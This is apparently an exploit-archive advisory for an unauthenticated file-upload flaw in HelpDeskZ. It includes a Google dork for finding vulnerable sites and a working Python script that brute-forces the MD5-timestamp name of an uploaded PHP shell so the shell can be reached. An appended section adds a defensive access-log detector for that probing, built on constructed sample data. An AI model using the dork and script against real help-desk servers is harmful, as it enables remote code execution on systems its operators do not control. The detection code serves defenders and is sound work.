# Exploit Title: HelpDeskZ 2.1.0 - Unauthenticated Arbitrary File Upload
# Google Dork: intext:"Help Desk Software by HelpDeskZ"
# Exploit Author: Dyar Sahdi
# Vendor Homepage: https://www.facebook.com/Dyar.Sahdi.Linux
# Version: <= v2.1.0
# Tested on: Windows 7, Linux, Windows 10, Windows XP
------------------------------------------
Exploit Tool: https://github.com/evolutionscript/HelpDeskZ-1.0/tree/006662bb856e126a38f2bb76df44a2e4e3d37350
------------------------------------------------------------------------------------------------------------------------------------
Tools Link
------------------
1-https://ghostbin.com/paste/ry5j7
----------------------------------------
Steps to reproduce:
 
http://localhost/helpdeskz/?v=submit_ticket&action=displayForm
-----------------------------------------------------------------------------
Exploit.py
-------------------------
import hashlib
import time
import sys
import requests
 
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
 
if len(sys.argv) < 3:
    print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
    sys.exit(1)
 
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
 
currentTime = int(time.time())
 
for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext).hexdigest()
 
    url = helpdeskzBaseUrl+md5hash+'.php'
    response = requests.head(url)
    if response.status_code == 200:
        print "found!"
        print url
        sys.exit(0)
 
print "Sorry, I did not find anything"
-----------------------------------------
Location: 
exploit.py http://localhost/helpdeskz/ phpshell.php
+++++++++++++++++++++++++++++++++++
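
Detection side of the script above, as an added example that is not part of the original advisory: the script requests many MD5-named .php paths in a row, so one client asking for several distinct 32-hex-character .php names stands out in a web access log. The log lines, the /uploads/ path, the IP addresses and the threshold are constructed assumptions.

```python
import hashlib
import re
from collections import defaultdict

# Common/combined access-log prefix: client, timestamp, request line, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Upload names of the form md5hex + ".php", as probed by the script above.
HASH_PHP_RE = re.compile(r'/[0-9a-f]{32}\.php$')


def build_sample_log():
    """Constructed log lines (documentation IPs, made-up /uploads/ path)."""
    fmt = '%s - - [01/Jan/2024:10:00:%02d +0000] "%s %s HTTP/1.1" %d 0'
    lines = []
    for i in range(6):  # one client walking candidate names, last one exists
        name = hashlib.md5(("constructed-%d" % i).encode()).hexdigest()
        status = 200 if i == 5 else 404
        lines.append(fmt % ("203.0.113.7", i, "HEAD", "/uploads/%s.php" % name, status))
    other = hashlib.md5(b"constructed-other").hexdigest()
    lines.append(fmt % ("198.51.100.4", 7, "GET", "/uploads/%s.php" % other, 404))
    lines.append(fmt % ("198.51.100.4", 8, "GET", "/index.php?v=submit_ticket", 200))
    return "\n".join(lines)


def find_hash_probing(log_text, threshold=5):
    """Return {ip: {"probes": n, "hits": [...]}} for clients that requested
    at least `threshold` distinct MD5-named .php paths."""
    seen = defaultdict(set)
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, path, status = m.groups()
        path = path.split("?", 1)[0]  # ignore query strings
        if not HASH_PHP_RE.search(path):
            continue
        seen[ip].add(path)
        if status == "200":  # the guessed file exists and is web-reachable
            hits[ip].append(path)
    return {ip: {"probes": len(paths), "hits": hits[ip]}
            for ip, paths in seen.items() if len(paths) >= threshold}


if __name__ == "__main__":
    for ip, info in find_hash_probing(build_sample_log()).items():
        print(ip, info["probes"], "probes;", "reachable:", info["hits"])
```

A client reported with a non-empty "hits" list means an uploaded .php file is being served from the attachment directory and should be triaged first.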
